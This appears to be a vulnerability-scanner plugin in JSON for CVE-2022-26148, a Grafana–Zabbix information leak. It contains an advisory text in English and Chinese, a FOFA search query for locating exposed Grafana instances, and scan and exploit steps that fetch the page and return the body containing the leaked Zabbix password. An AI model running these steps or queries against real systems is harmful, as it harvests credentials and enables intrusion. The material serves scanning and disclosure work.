
{
"Name": "Grafana Zabbix Information Leakage (CVE-2022-26148)",
"Description": "<p>Grafana is a set of open source monitoring tools from Grafana Labs that provides a visual monitoring interface. It is mainly used to monitor and analyze data from Graphite, InfluxDB, Prometheus and similar sources.<br></p><p>There is a security vulnerability in Grafana 7.3.4 and earlier versions which originates from the integration of those versions with Zabbix: the Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Product": "Grafana",
"Homepage": "https://grafana.com",
"DisclosureDate": "2022-03-30",
"Author": "abszse",
"FofaQuery": "title=\"Grafana\" && body=\"alexanderzobnin-zabbix-datasource\"",
"GobyQuery": "title=\"Grafana\" && body=\"alexanderzobnin-zabbix-datasource\"",
"Level": "3",
"Impact": "<p>There is a security vulnerability in Grafana 7.3.4 and earlier versions which originates from the integration of those versions with Zabbix: the Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Recommendation": "<p>Apply the official updates promptly: <a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"References": [
"https://2k8.org/post-319.html"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "zabbix",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "alexanderzobnin-zabbix-datasource",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "password\":\"",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "alexanderzobnin-zabbix-datasource",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "password",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"Information Disclosure"
],
"VulType": [
"Information Disclosure"
],
"CVEIDs": [
"CVE-2022-26148"
],
"CNNVD": [
"CNNVD-202203-1938"
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "Grafana 集成 Zabbix 存在信息泄露漏洞(CVE-2022-26148)",
"Product": "Grafana",
"Description": "<p>Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。<br></p><p>Grafana 7.3.4版本及之前版本存在安全漏洞该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时可以右键查看源码使用Ctrl-F在api_jsonrpc.php中搜索password可以发现Zabbix的账号密码和URL地址。<br></p>",
"Recommendation": "<p>及时关注官网更新:<a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"Impact": "<p>Grafana 7.3.4版本及之前版本存在安全漏洞该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时可以右键查看源码使用Ctrl-F在api_jsonrpc.php中搜索password可以发现Zabbix的账号密码和URL地址。<br></p>",
"VulType": [
"信息泄漏"
],
"Tags": [
"信息泄漏"
]
},
"EN": {
"Name": "Grafana Zabbix Information Leakage (CVE-2022-26148)",
"Product": "Grafana",
"Description": "<p>Grafana is a set of open source monitoring tools from Grafana Labs that provides a visual monitoring interface. It is mainly used to monitor and analyze data from Graphite, InfluxDB, Prometheus and similar sources.<br></p><p>There is a security vulnerability in Grafana 7.3.4 and earlier versions which originates from the integration of those versions with Zabbix: the Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Recommendation": "<p>Apply the official updates promptly: <a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"Impact": "<p>There is a security vulnerability in Grafana 7.3.4 and earlier versions which originates from the integration of those versions with Zabbix: the Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"VulType": [
"Information Disclosure"
],
"Tags": [
"Information Disclosure"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}